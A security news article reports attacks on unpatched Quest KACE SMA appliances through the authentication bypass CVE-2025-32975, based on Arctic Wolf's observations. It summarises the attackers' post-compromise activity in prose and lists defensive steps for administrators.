Hackers target unpatched Quest KACE SMA systems through critical CVE-2025-32975 flaw

Threat actors are now targeting unpatched Quest KACE Systems Management Appliance, or SMA, systems by abusing CVE-2025-32975, a critical authentication bypass flaw with a CVSS score of 10.0. Arctic Wolf said it observed malicious activity starting the week of March 9, 2026, in customer environments, and the activity matched exploitation of internet-exposed SMA instances that had not received Quest’s fix.

The bug allows attackers to impersonate legitimate users without valid credentials and can lead to full administrative takeover. Quest patched the issue in May 2025, but the latest findings suggest that organizations that left SMA appliances exposed and unpatched still face a serious risk.

Arctic Wolf said the attackers appear to have used the flaw to seize administrative control, run remote commands, and pull Base64-encoded payloads from an external server using curl. The company added that it has not yet confirmed the attackers’ final objective.

What happened

Quest KACE SMA is an on-premises endpoint management platform used for inventory, software deployment, patching, and monitoring. According to Arctic Wolf, the recent activity affected unpatched SMA systems that were publicly exposed to the internet.

The issue itself is tied to the product’s SSO authentication handling. NVD describes CVE-2025-32975 as an authentication bypass vulnerability that can let attackers impersonate valid users and take over administrative accounts.

What attackers reportedly did after gaining access

After the initial compromise, Arctic Wolf said the attackers created additional admin accounts through runkbot.exe, a background process tied to the SMA Agent that runs scripts and manages installations. The company also observed Windows Registry changes through PowerShell, which may point to persistence or follow-on system changes.

Arctic Wolf’s observed post-compromise activity included:

• Credential harvesting with Mimikatz
• Reconnaissance on logged-in users and administrator groups
• Use of commands such as net time and net group
• Access attempts involving backup infrastructure, including Veeam and Veritas
• Movement toward domain controllers through RDP access

Affected and fixed versions

Quest said the vulnerabilities were resolved in the following KACE SMA versions:

NVD lists the same affected version ranges and confirms that builds earlier than those releases remain vulnerable.

Why this matters

A CVSS 10.0 score marks this as a maximum-severity issue, and the latest threat activity raises the stakes further because it moves the flaw from a patching bulletin into a live intrusion risk. Publicly exposed management appliances already make attractive targets because they often sit close to administrative workflows, scripts, endpoints, and credentials.

This also means defenders should treat unpatched SMA exposure as an urgent incident-response matter, not just a routine update backlog item. If an appliance remained internet-facing and below the fixed versions, teams should assume compromise is possible and investigate for new admin accounts, suspicious script execution, unexpected outbound connections, registry changes, and credential theft tools. This last sentence is an inference based on Arctic Wolf’s observed tradecraft and the vulnerability’s impact.

What admins should do now

Quest recommends updating to a secure version, and Arctic Wolf said organizations should avoid exposing SMA instances directly to the internet.

Priority steps:

• Patch KACE SMA to a fixed version immediately
• Remove direct internet exposure where possible
• Review admin accounts for any unauthorized additions
• Check for curl activity tied to unusual external infrastructure
• Investigate runkbot.exe use outside expected workflows
• Hunt for PowerShell-based registry changes
• Look for Mimikatz artifacts and lateral movement toward backup servers or domain controllers

FAQ